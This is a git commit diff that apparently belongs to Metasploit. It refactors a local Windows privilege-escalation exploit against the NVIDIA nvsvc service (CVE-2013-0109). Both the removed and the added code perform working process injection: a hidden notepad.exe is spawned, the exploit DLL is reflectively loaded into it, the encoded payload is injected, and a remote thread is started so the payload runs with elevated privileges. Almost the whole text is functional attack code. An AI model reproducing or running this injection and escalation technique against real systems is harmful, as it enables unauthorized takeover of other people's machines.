Re-add RDI mixin changes
parent
e22b4ba88c
commit
41c538856a
|
@ -120,12 +120,6 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
end
|
||||
|
||||
def create_proc
|
||||
windir = expand_path("%windir%")
|
||||
cmd = "#{windir}\\SysWOW64\\notepad.exe"
|
||||
return session.sys.process.execute(cmd, nil, {'Hidden' => true }).pid
|
||||
end
|
||||
|
||||
def is_running?
|
||||
begin
|
||||
status = service_status('nvsvc')
|
||||
|
@ -134,60 +128,39 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_error("Unable to retrieve service status")
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless is_running?
|
||||
print_error("Service not running - attempting to start")
|
||||
res = service_start('nvsvc')
|
||||
case res
|
||||
when 0
|
||||
print_good("Service started")
|
||||
when 1
|
||||
print_status("Service already started")
|
||||
else
|
||||
fail_with(Exploit::Failure::Unknown, "Unable to start service")
|
||||
end
|
||||
else
|
||||
print_good("Service is running")
|
||||
if is_system?
|
||||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
dll = ''
|
||||
offset = nil
|
||||
file = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2013-0109", "exploit.dll")
|
||||
File.open( file,"rb" ) { |f| dll += f.read(f.stat.size) }
|
||||
|
||||
pay = payload.encoded
|
||||
|
||||
bo = dll.index('PAYLOAD:')
|
||||
raise RuntimeError, "Invalid Win32 PE DLL template: missing \"PAYLOAD:\" tag" if not bo
|
||||
dll[bo, pay.length] = [pay].pack("a*")
|
||||
|
||||
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
|
||||
|
||||
pe.exports.entries.each do |entry|
|
||||
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
|
||||
offset = pe.rva_to_file_offset( entry.rva )
|
||||
break
|
||||
end
|
||||
unless check == Exploit::CheckCode::Vulnerable
|
||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||
end
|
||||
|
||||
print_error("No offset found") unless offset
|
||||
print_status("Launching notepad to host the exploit...")
|
||||
process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
|
||||
host_process = client.sys.process.open(process.pid, PROCESS_ALL_ACCESS)
|
||||
print_good("Process #{process.pid} launched.")
|
||||
|
||||
new_pid = create_proc
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
library_path = ::File.join(Msf::Config.data_directory, "exploits",
|
||||
"CVE-2013-0109", "nvidia_nvsvc.x86.dll")
|
||||
library_path = ::File.expand_path(library_path)
|
||||
|
||||
if not new_pid
|
||||
fail_with(Exploit::Failure::Unknown, "Failed to create a new process")
|
||||
end
|
||||
print_status("Injecting exploit into #{process.pid} ...")
|
||||
exploit_mem, offset = inject_dll_into_process(host_process, library_path)
|
||||
|
||||
vprint_status("Injecting payload into memory")
|
||||
host_process = session.sys.process.open(new_pid.to_i, PROCESS_ALL_ACCESS)
|
||||
mem = host_process.memory.allocate(dll.length + (dll.length % 1024))
|
||||
host_process.memory.protect(mem)
|
||||
host_process.memory.write(mem, dll)
|
||||
print_status("Executing exploit...")
|
||||
host_process.thread.create(mem+offset)
|
||||
print_status("Exploit injected. Injecting payload into #{process.pid}...")
|
||||
payload_mem = inject_into_process(host_process, payload.encoded)
|
||||
|
||||
# invoke the exploit, passing in the address of the payload that
|
||||
# we want invoked on successful exploitation.
|
||||
print_status("Payload injected. Executing exploit...")
|
||||
host_process.thread.create(exploit_mem + offset, payload_mem)
|
||||
|
||||
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue